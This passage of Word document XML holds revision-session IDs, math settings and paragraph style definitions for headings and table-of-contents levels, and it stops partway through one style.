    <w:rsid w:val="00EE0F8E"/>
    <w:rsid w:val="00EE11F7"/>
    <w:rsid w:val="00EE1490"/>
    <w:rsid w:val="00EE15F0"/>
    <w:rsid w:val="00EE1E5B"/>
    <w:rsid w:val="00EE2C28"/>
    <w:rsid w:val="00EE30C7"/>
    <w:rsid w:val="00EE348E"/>
    <w:rsid w:val="00EE34D0"/>
    <w:rsid w:val="00EE3AD8"/>
    <w:rsid w:val="00EE4776"/>
    <w:rsid w:val="00EE5CEF"/>
    <w:rsid w:val="00EE5E01"/>
    <w:rsid w:val="00EE6408"/>
    <w:rsid w:val="00EE69A6"/>
    <w:rsid w:val="00EE6CDF"/>
    <w:rsid w:val="00EE7B16"/>
    <w:rsid w:val="00EF086D"/>
    <w:rsid w:val="00EF0CC9"/>
    <w:rsid w:val="00EF0D97"/>
    <w:rsid w:val="00EF1EB9"/>
    <w:rsid w:val="00EF252B"/>
    <w:rsid w:val="00EF26AA"/>
    <w:rsid w:val="00EF397C"/>
    <w:rsid w:val="00EF3FE1"/>
    <w:rsid w:val="00EF4632"/>
    <w:rsid w:val="00EF4F27"/>
    <w:rsid w:val="00EF5A9B"/>
    <w:rsid w:val="00EF5DF4"/>
    <w:rsid w:val="00EF6387"/>
    <w:rsid w:val="00EF6527"/>
    <w:rsid w:val="00EF672B"/>
    <w:rsid w:val="00F01C54"/>
    <w:rsid w:val="00F027AC"/>
    <w:rsid w:val="00F0288C"/>
    <w:rsid w:val="00F02CCE"/>
    <w:rsid w:val="00F046EB"/>
    <w:rsid w:val="00F05191"/>
    <w:rsid w:val="00F05E84"/>
    <w:rsid w:val="00F05E85"/>
    <w:rsid w:val="00F062C9"/>
    <w:rsid w:val="00F06524"/>
    <w:rsid w:val="00F1036C"/>
    <w:rsid w:val="00F10482"/>
    <w:rsid w:val="00F10722"/>
    <w:rsid w:val="00F10945"/>
    <w:rsid w:val="00F1117C"/>
    <w:rsid w:val="00F113BE"/>
    <w:rsid w:val="00F11D11"/>
    <w:rsid w:val="00F12651"/>
    <w:rsid w:val="00F13631"/>
    <w:rsid w:val="00F14D5C"/>
    <w:rsid w:val="00F14DC5"/>
    <w:rsid w:val="00F16964"/>
    <w:rsid w:val="00F17727"/>
    <w:rsid w:val="00F20023"/>
    <w:rsid w:val="00F21549"/>
    <w:rsid w:val="00F218F8"/>
    <w:rsid w:val="00F21BA1"/>
    <w:rsid w:val="00F234D0"/>
    <w:rsid w:val="00F23D8D"/>
    <w:rsid w:val="00F23D90"/>
    <w:rsid w:val="00F23FC9"/>
    <w:rsid w:val="00F250C8"/>
    <w:rsid w:val="00F25523"/>
    <w:rsid w:val="00F26652"/>
    <w:rsid w:val="00F3017E"/>
    <w:rsid w:val="00F311D2"/>
    <w:rsid w:val="00F3271D"/>
    <w:rsid w:val="00F32A96"/>
    <w:rsid w:val="00F32B88"/>
    <w:rsid w:val="00F333A5"/>
    <w:rsid w:val="00F34614"/>
    <w:rsid w:val="00F3546E"/>
    <w:rsid w:val="00F35A2F"/>
    <w:rsid w:val="00F35F33"/>
    <w:rsid w:val="00F36D46"/>
    <w:rsid w:val="00F377F1"/>
    <w:rsid w:val="00F37CB1"/>
    <w:rsid w:val="00F37D0A"/>
    <w:rsid w:val="00F40172"/>
    <w:rsid w:val="00F403E4"/>
    <w:rsid w:val="00F40A72"/>
    <w:rsid w:val="00F40BDD"/>
    <w:rsid w:val="00F44946"/>
    <w:rsid w:val="00F45111"/>
    <w:rsid w:val="00F45B67"/>
    <w:rsid w:val="00F461F5"/>
    <w:rsid w:val="00F46352"/>
    <w:rsid w:val="00F4662C"/>
    <w:rsid w:val="00F472F5"/>
    <w:rsid w:val="00F47309"/>
    <w:rsid w:val="00F477ED"/>
    <w:rsid w:val="00F47E55"/>
    <w:rsid w:val="00F5016A"/>
    <w:rsid w:val="00F501CF"/>
    <w:rsid w:val="00F50D2F"/>
    <w:rsid w:val="00F50E67"/>
    <w:rsid w:val="00F50F41"/>
    <w:rsid w:val="00F52373"/>
    <w:rsid w:val="00F52C3B"/>
    <w:rsid w:val="00F531A5"/>
    <w:rsid w:val="00F54FD6"/>
    <w:rsid w:val="00F57302"/>
    <w:rsid w:val="00F61194"/>
    <w:rsid w:val="00F61298"/>
    <w:rsid w:val="00F62D9D"/>
    <w:rsid w:val="00F63FE8"/>
    <w:rsid w:val="00F64858"/>
    <w:rsid w:val="00F66703"/>
    <w:rsid w:val="00F66B20"/>
    <w:rsid w:val="00F67713"/>
    <w:rsid w:val="00F67C35"/>
    <w:rsid w:val="00F70C03"/>
    <w:rsid w:val="00F70E7B"/>
    <w:rsid w:val="00F7100A"/>
    <w:rsid w:val="00F71A00"/>
    <w:rsid w:val="00F736C1"/>
    <w:rsid w:val="00F74DC0"/>
    <w:rsid w:val="00F764BC"/>
    <w:rsid w:val="00F7679B"/>
    <w:rsid w:val="00F76FC5"/>
    <w:rsid w:val="00F802DE"/>
    <w:rsid w:val="00F8290C"/>
    <w:rsid w:val="00F84179"/>
    <w:rsid w:val="00F85E92"/>
    <w:rsid w:val="00F87F79"/>
    <w:rsid w:val="00F91760"/>
    <w:rsid w:val="00F923C2"/>
    <w:rsid w:val="00F935A9"/>
    <w:rsid w:val="00F962BF"/>
    <w:rsid w:val="00F97D9C"/>
    <w:rsid w:val="00FA0388"/>
    <w:rsid w:val="00FA0E7E"/>
    <w:rsid w:val="00FA1CF4"/>
    <w:rsid w:val="00FA2147"/>
    <w:rsid w:val="00FA24F6"/>
    <w:rsid w:val="00FA26B7"/>
    <w:rsid w:val="00FA4749"/>
    <w:rsid w:val="00FA516C"/>
    <w:rsid w:val="00FA5DFC"/>
    <w:rsid w:val="00FA6441"/>
    <w:rsid w:val="00FA79CA"/>
    <w:rsid w:val="00FB05FD"/>
    <w:rsid w:val="00FB1854"/>
    <w:rsid w:val="00FB272F"/>
    <w:rsid w:val="00FB2AD5"/>
    <w:rsid w:val="00FB2BEA"/>
    <w:rsid w:val="00FB3800"/>
    <w:rsid w:val="00FB41D5"/>
    <w:rsid w:val="00FB461B"/>
    <w:rsid w:val="00FB4C28"/>
    <w:rsid w:val="00FB53C0"/>
    <w:rsid w:val="00FB555F"/>
    <w:rsid w:val="00FB596B"/>
    <w:rsid w:val="00FB7D48"/>
    <w:rsid w:val="00FB7DBA"/>
    <w:rsid w:val="00FB7F68"/>
    <w:rsid w:val="00FC0D9E"/>
    <w:rsid w:val="00FC1B0A"/>
    <w:rsid w:val="00FC232B"/>
    <w:rsid w:val="00FC38B8"/>
    <w:rsid w:val="00FC3F77"/>
    <w:rsid w:val="00FC4522"/>
    <w:rsid w:val="00FC56EA"/>
    <w:rsid w:val="00FC740D"/>
    <w:rsid w:val="00FC7603"/>
    <w:rsid w:val="00FC7759"/>
    <w:rsid w:val="00FC7A8A"/>
    <w:rsid w:val="00FD0FB4"/>
    <w:rsid w:val="00FD1B0C"/>
    <w:rsid w:val="00FD2588"/>
    <w:rsid w:val="00FD2C08"/>
    <w:rsid w:val="00FD30F5"/>
    <w:rsid w:val="00FD348D"/>
    <w:rsid w:val="00FD3ACF"/>
    <w:rsid w:val="00FD410E"/>
    <w:rsid w:val="00FD4756"/>
    <w:rsid w:val="00FD5372"/>
    <w:rsid w:val="00FD5786"/>
    <w:rsid w:val="00FD5ADC"/>
    <w:rsid w:val="00FD6DB0"/>
    <w:rsid w:val="00FE2548"/>
    <w:rsid w:val="00FE4E4C"/>
    <w:rsid w:val="00FE5863"/>
    <w:rsid w:val="00FE5E41"/>
    <w:rsid w:val="00FE62FD"/>
    <w:rsid w:val="00FE630F"/>
    <w:rsid w:val="00FE7343"/>
    <w:rsid w:val="00FF0F8D"/>
    <w:rsid w:val="00FF10F3"/>
    <w:rsid w:val="00FF14DE"/>
    <w:rsid w:val="00FF2059"/>
    <w:rsid w:val="00FF2188"/>
    <w:rsid w:val="00FF22F6"/>
    <w:rsid w:val="00FF2E3D"/>
    <w:rsid w:val="00FF3308"/>
    <w:rsid w:val="00FF4111"/>
    <w:rsid w:val="00FF4D81"/>
    <w:rsid w:val="00FF5719"/>
    <w:rsid w:val="00FF5A9D"/>
    <w:rsid w:val="00FF73B8"/>
    <w:rsid w:val="00FF756D"/>
    <w:rsid w:val="011416D3"/>
    <w:rsid w:val="01BC291B"/>
    <w:rsid w:val="01E81E05"/>
    <w:rsid w:val="027F7376"/>
    <w:rsid w:val="030F5534"/>
    <w:rsid w:val="03776377"/>
    <w:rsid w:val="03ED2ED0"/>
    <w:rsid w:val="03FA54C6"/>
    <w:rsid w:val="046CF4CD"/>
    <w:rsid w:val="06094D31"/>
    <w:rsid w:val="0659AC64"/>
    <w:rsid w:val="067A8C4D"/>
    <w:rsid w:val="06AED178"/>
    <w:rsid w:val="07AF0C6A"/>
    <w:rsid w:val="07B174FF"/>
    <w:rsid w:val="07BDA02D"/>
    <w:rsid w:val="08306DFE"/>
    <w:rsid w:val="0894FF6C"/>
    <w:rsid w:val="08BF0293"/>
    <w:rsid w:val="090F0B2B"/>
    <w:rsid w:val="099E7C3F"/>
    <w:rsid w:val="09B3ECF3"/>
    <w:rsid w:val="09CB2FB7"/>
    <w:rsid w:val="0ABF98DA"/>
    <w:rsid w:val="0AD16C7C"/>
    <w:rsid w:val="0AF14F5C"/>
    <w:rsid w:val="0B161DF0"/>
    <w:rsid w:val="0B6ECF72"/>
    <w:rsid w:val="0CC9AE5F"/>
    <w:rsid w:val="0D187993"/>
    <w:rsid w:val="0D2E2D35"/>
    <w:rsid w:val="0D884F09"/>
    <w:rsid w:val="0DCE8397"/>
    <w:rsid w:val="0EB4665E"/>
    <w:rsid w:val="0EC56E36"/>
    <w:rsid w:val="0F78083E"/>
    <w:rsid w:val="10AACF79"/>
    <w:rsid w:val="10AB2018"/>
    <w:rsid w:val="118892DA"/>
    <w:rsid w:val="11C4CDB7"/>
    <w:rsid w:val="1232A88C"/>
    <w:rsid w:val="124B2885"/>
    <w:rsid w:val="12733688"/>
    <w:rsid w:val="131536F4"/>
    <w:rsid w:val="13D1051F"/>
    <w:rsid w:val="1420658E"/>
    <w:rsid w:val="14301521"/>
    <w:rsid w:val="14C2354D"/>
    <w:rsid w:val="152630A5"/>
    <w:rsid w:val="1655632F"/>
    <w:rsid w:val="16C7C104"/>
    <w:rsid w:val="16D5F394"/>
    <w:rsid w:val="173038D4"/>
    <w:rsid w:val="173A3AEC"/>
    <w:rsid w:val="17DF35CC"/>
    <w:rsid w:val="188E6071"/>
    <w:rsid w:val="19873590"/>
    <w:rsid w:val="19B207BF"/>
    <w:rsid w:val="19EB223A"/>
    <w:rsid w:val="1C075EAA"/>
    <w:rsid w:val="1C26F439"/>
    <w:rsid w:val="1C8D3431"/>
    <w:rsid w:val="1D0A83BE"/>
    <w:rsid w:val="1DBA7E36"/>
    <w:rsid w:val="1DC08E06"/>
    <w:rsid w:val="1DF75108"/>
    <w:rsid w:val="1E0EC8B7"/>
    <w:rsid w:val="1E55954A"/>
    <w:rsid w:val="1E6B00BD"/>
    <w:rsid w:val="1ED7BDD9"/>
    <w:rsid w:val="1EEC3B64"/>
    <w:rsid w:val="1F175D22"/>
    <w:rsid w:val="1F9A0346"/>
    <w:rsid w:val="203F2152"/>
    <w:rsid w:val="2161361E"/>
    <w:rsid w:val="217427AB"/>
    <w:rsid w:val="2192430B"/>
    <w:rsid w:val="21AA5B82"/>
    <w:rsid w:val="22093C33"/>
    <w:rsid w:val="2222D0BE"/>
    <w:rsid w:val="2226C775"/>
    <w:rsid w:val="22529219"/>
    <w:rsid w:val="22C91E89"/>
    <w:rsid w:val="234EA093"/>
    <w:rsid w:val="238D7706"/>
    <w:rsid w:val="240C871B"/>
    <w:rsid w:val="249F634E"/>
    <w:rsid w:val="24F7A74C"/>
    <w:rsid w:val="252AFF6E"/>
    <w:rsid w:val="26374B70"/>
    <w:rsid w:val="26517499"/>
    <w:rsid w:val="27504325"/>
    <w:rsid w:val="2774D956"/>
    <w:rsid w:val="28335F08"/>
    <w:rsid w:val="2847B3FC"/>
    <w:rsid w:val="284DDF0A"/>
    <w:rsid w:val="28F96AAB"/>
    <w:rsid w:val="290A42B0"/>
    <w:rsid w:val="291A2A7B"/>
    <w:rsid w:val="295F188B"/>
    <w:rsid w:val="29667AA3"/>
    <w:rsid w:val="2974C7A3"/>
    <w:rsid w:val="29E5D3DD"/>
    <w:rsid w:val="29F4CFCE"/>
    <w:rsid w:val="29F7B1DA"/>
    <w:rsid w:val="2A23AEA7"/>
    <w:rsid w:val="2AC610CF"/>
    <w:rsid w:val="2B759FBA"/>
    <w:rsid w:val="2B8E3CE5"/>
    <w:rsid w:val="2BFA4357"/>
    <w:rsid w:val="2C648BB0"/>
    <w:rsid w:val="2C653FAE"/>
    <w:rsid w:val="2CB2A741"/>
    <w:rsid w:val="2F6FA99F"/>
    <w:rsid w:val="2FD34A75"/>
    <w:rsid w:val="306EDB41"/>
    <w:rsid w:val="309364BC"/>
    <w:rsid w:val="30947F66"/>
    <w:rsid w:val="30A88A85"/>
    <w:rsid w:val="30D77846"/>
    <w:rsid w:val="30EF0094"/>
    <w:rsid w:val="3119B4F7"/>
    <w:rsid w:val="314640E7"/>
    <w:rsid w:val="32AED7DE"/>
    <w:rsid w:val="3360E5DD"/>
    <w:rsid w:val="34433079"/>
    <w:rsid w:val="3447F68C"/>
    <w:rsid w:val="34EB94DC"/>
    <w:rsid w:val="34F9F025"/>
    <w:rsid w:val="35250A52"/>
    <w:rsid w:val="3567E6B4"/>
    <w:rsid w:val="3749B39A"/>
    <w:rsid w:val="37FF181F"/>
    <w:rsid w:val="3809EC81"/>
    <w:rsid w:val="3830FBE8"/>
    <w:rsid w:val="3875FA5A"/>
    <w:rsid w:val="38774E48"/>
    <w:rsid w:val="38AA3BA6"/>
    <w:rsid w:val="38F7F7FF"/>
    <w:rsid w:val="39517ECC"/>
    <w:rsid w:val="399B5C4F"/>
    <w:rsid w:val="39A7CBA6"/>
    <w:rsid w:val="39E2324E"/>
    <w:rsid w:val="3A2DEF81"/>
    <w:rsid w:val="3A3089E4"/>
    <w:rsid w:val="3A6FC043"/>
    <w:rsid w:val="3AD395F1"/>
    <w:rsid w:val="3B14B6CA"/>
    <w:rsid w:val="3BA980B8"/>
    <w:rsid w:val="3BDDE454"/>
    <w:rsid w:val="3C7A1387"/>
    <w:rsid w:val="3C8C28D4"/>
    <w:rsid w:val="3CA4D6E1"/>
    <w:rsid w:val="3CCAEB39"/>
    <w:rsid w:val="3D803051"/>
    <w:rsid w:val="3EAB24F4"/>
    <w:rsid w:val="3EE2B4BE"/>
    <w:rsid w:val="3EE535E3"/>
    <w:rsid w:val="3EF144FC"/>
    <w:rsid w:val="3F65257E"/>
    <w:rsid w:val="402A37DF"/>
    <w:rsid w:val="40F47485"/>
    <w:rsid w:val="4100D223"/>
    <w:rsid w:val="4165282F"/>
    <w:rsid w:val="41B56FC7"/>
    <w:rsid w:val="41F19C21"/>
    <w:rsid w:val="4223D3E7"/>
    <w:rsid w:val="42513267"/>
    <w:rsid w:val="42DCFEF5"/>
    <w:rsid w:val="436DBF29"/>
    <w:rsid w:val="436E0368"/>
    <w:rsid w:val="43B6D425"/>
    <w:rsid w:val="43CEF484"/>
    <w:rsid w:val="440B45F4"/>
    <w:rsid w:val="44538FD9"/>
    <w:rsid w:val="44A4E63C"/>
    <w:rsid w:val="45016FF1"/>
    <w:rsid w:val="450A464A"/>
    <w:rsid w:val="45620BAC"/>
    <w:rsid w:val="45F4F27E"/>
    <w:rsid w:val="46D21D5A"/>
    <w:rsid w:val="46E8AD3B"/>
    <w:rsid w:val="47B75D4E"/>
    <w:rsid w:val="4845A294"/>
    <w:rsid w:val="48763796"/>
    <w:rsid w:val="48EDE561"/>
    <w:rsid w:val="4948777A"/>
    <w:rsid w:val="4977A0C8"/>
    <w:rsid w:val="4A1FE080"/>
    <w:rsid w:val="4B298059"/>
    <w:rsid w:val="4B31AFB4"/>
    <w:rsid w:val="4BC714A6"/>
    <w:rsid w:val="4BFA2356"/>
    <w:rsid w:val="4BFE1CBF"/>
    <w:rsid w:val="4C3ABA09"/>
    <w:rsid w:val="4C3B6F2C"/>
    <w:rsid w:val="4D26B181"/>
    <w:rsid w:val="4D451BE1"/>
    <w:rsid w:val="4D7FE1C7"/>
    <w:rsid w:val="4DD40EC9"/>
    <w:rsid w:val="4DD91FB0"/>
    <w:rsid w:val="4DF275F5"/>
    <w:rsid w:val="4E00EFCA"/>
    <w:rsid w:val="4E22224B"/>
    <w:rsid w:val="4E505825"/>
    <w:rsid w:val="4F6B5FE4"/>
    <w:rsid w:val="4FA1AF99"/>
    <w:rsid w:val="50772B9C"/>
    <w:rsid w:val="50C80F06"/>
    <w:rsid w:val="50FA60EF"/>
    <w:rsid w:val="511508E8"/>
    <w:rsid w:val="51B2FB96"/>
    <w:rsid w:val="52E00D1D"/>
    <w:rsid w:val="52F80B61"/>
    <w:rsid w:val="530B04A8"/>
    <w:rsid w:val="53BB567B"/>
    <w:rsid w:val="53F6C94D"/>
    <w:rsid w:val="540ECF98"/>
    <w:rsid w:val="544BADE9"/>
    <w:rsid w:val="546AAA22"/>
    <w:rsid w:val="54CF5A3F"/>
    <w:rsid w:val="557BA10B"/>
    <w:rsid w:val="5617443F"/>
    <w:rsid w:val="565B3594"/>
    <w:rsid w:val="56A15A06"/>
    <w:rsid w:val="571B55DB"/>
    <w:rsid w:val="57892A35"/>
    <w:rsid w:val="57A51E84"/>
    <w:rsid w:val="5873CE13"/>
    <w:rsid w:val="58D28D89"/>
    <w:rsid w:val="5A0EC277"/>
    <w:rsid w:val="5A2A408E"/>
    <w:rsid w:val="5B18B8D4"/>
    <w:rsid w:val="5B3394B9"/>
    <w:rsid w:val="5BA491C6"/>
    <w:rsid w:val="5BB3FB36"/>
    <w:rsid w:val="5BE980F2"/>
    <w:rsid w:val="5C33BDE2"/>
    <w:rsid w:val="5C978C76"/>
    <w:rsid w:val="5CB91068"/>
    <w:rsid w:val="5CCBBFC3"/>
    <w:rsid w:val="5D785C13"/>
    <w:rsid w:val="5E4248D6"/>
    <w:rsid w:val="5F0348BF"/>
    <w:rsid w:val="5FC400FA"/>
    <w:rsid w:val="5FE58E72"/>
    <w:rsid w:val="602986C1"/>
    <w:rsid w:val="61EBED56"/>
    <w:rsid w:val="624D80FE"/>
    <w:rsid w:val="6299753C"/>
    <w:rsid w:val="62D62250"/>
    <w:rsid w:val="63B205A3"/>
    <w:rsid w:val="63D07F38"/>
    <w:rsid w:val="646325F4"/>
    <w:rsid w:val="64917AAE"/>
    <w:rsid w:val="64AB8688"/>
    <w:rsid w:val="64F4EB37"/>
    <w:rsid w:val="64F91AB4"/>
    <w:rsid w:val="65116661"/>
    <w:rsid w:val="65453979"/>
    <w:rsid w:val="65BDD4F0"/>
    <w:rsid w:val="660E2B54"/>
    <w:rsid w:val="66A2D987"/>
    <w:rsid w:val="66C68270"/>
    <w:rsid w:val="66C69A41"/>
    <w:rsid w:val="6756B77F"/>
    <w:rsid w:val="67B99413"/>
    <w:rsid w:val="682CB825"/>
    <w:rsid w:val="683C6974"/>
    <w:rsid w:val="6845FCFF"/>
    <w:rsid w:val="68A58D75"/>
    <w:rsid w:val="68BC1F60"/>
    <w:rsid w:val="690144D7"/>
    <w:rsid w:val="690B9498"/>
    <w:rsid w:val="6918B19F"/>
    <w:rsid w:val="6A2099CF"/>
    <w:rsid w:val="6A755041"/>
    <w:rsid w:val="6AEAD77E"/>
    <w:rsid w:val="6BB59A48"/>
    <w:rsid w:val="6BBFDBE2"/>
    <w:rsid w:val="6BF21DC8"/>
    <w:rsid w:val="6C261DB2"/>
    <w:rsid w:val="6D133685"/>
    <w:rsid w:val="6D6A44FD"/>
    <w:rsid w:val="6D7FEF79"/>
    <w:rsid w:val="6DB8F429"/>
    <w:rsid w:val="6DF3D7CD"/>
    <w:rsid w:val="6E5B472A"/>
    <w:rsid w:val="6E7D8F42"/>
    <w:rsid w:val="6EB075FE"/>
    <w:rsid w:val="6EFC9E73"/>
    <w:rsid w:val="6EFF74C6"/>
    <w:rsid w:val="6FF9BFE1"/>
    <w:rsid w:val="706394DB"/>
    <w:rsid w:val="70670437"/>
    <w:rsid w:val="70C448EA"/>
    <w:rsid w:val="71413687"/>
    <w:rsid w:val="71721596"/>
    <w:rsid w:val="729EF11E"/>
    <w:rsid w:val="7333D4ED"/>
    <w:rsid w:val="7393195C"/>
    <w:rsid w:val="73C27832"/>
    <w:rsid w:val="73E33305"/>
    <w:rsid w:val="74563712"/>
    <w:rsid w:val="74FBF1CF"/>
    <w:rsid w:val="76372821"/>
    <w:rsid w:val="7697F369"/>
    <w:rsid w:val="76F39A67"/>
    <w:rsid w:val="77358BBC"/>
    <w:rsid w:val="77AA56DF"/>
    <w:rsid w:val="77E4A959"/>
    <w:rsid w:val="77ECFDD6"/>
    <w:rsid w:val="78CBCD8D"/>
    <w:rsid w:val="7955228A"/>
    <w:rsid w:val="7B9F8C04"/>
    <w:rsid w:val="7BC113DE"/>
    <w:rsid w:val="7C7A6E0C"/>
    <w:rsid w:val="7D54261C"/>
    <w:rsid w:val="7DE7A6D7"/>
    <w:rsid w:val="7E633FBE"/>
    <w:rsid w:val="7EB89CDD"/>
    <w:rsid w:val="7EFA4ED2"/>
    <w:rsid w:val="7F2C5844"/>
    <w:rsid w:val="7F3C1250"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef m:val="0"/>
    <m:lMargin m:val="0"/>
    <m:rMargin m:val="0"/>
    <m:defJc m:val="centerGroup"/>
    <m:wrapRight/>
    <m:intLim m:val="subSup"/>
    <m:naryLim m:val="subSup"/>
  </m:mathPr>
  <w:themeFontLang w:val="en-SG"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7A700E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{36AE3141-2C6C-405A-97B5-A06B32500E1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SimSun" w:cs="Times New Roman"/>
        <w:lang w:val="en-SG" w:eastAsia="en-SG"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44946"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:aliases w:val="Heading 1 - Report"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="006936E1"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00BB6865"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:qFormat/>
    <w:rsid w:val="00BB6865"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:firstLine="720"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>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720"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressAutoHyphens/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:spacing w:val="-3"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>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720" w:hanging="720"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="002323F0"/>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name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
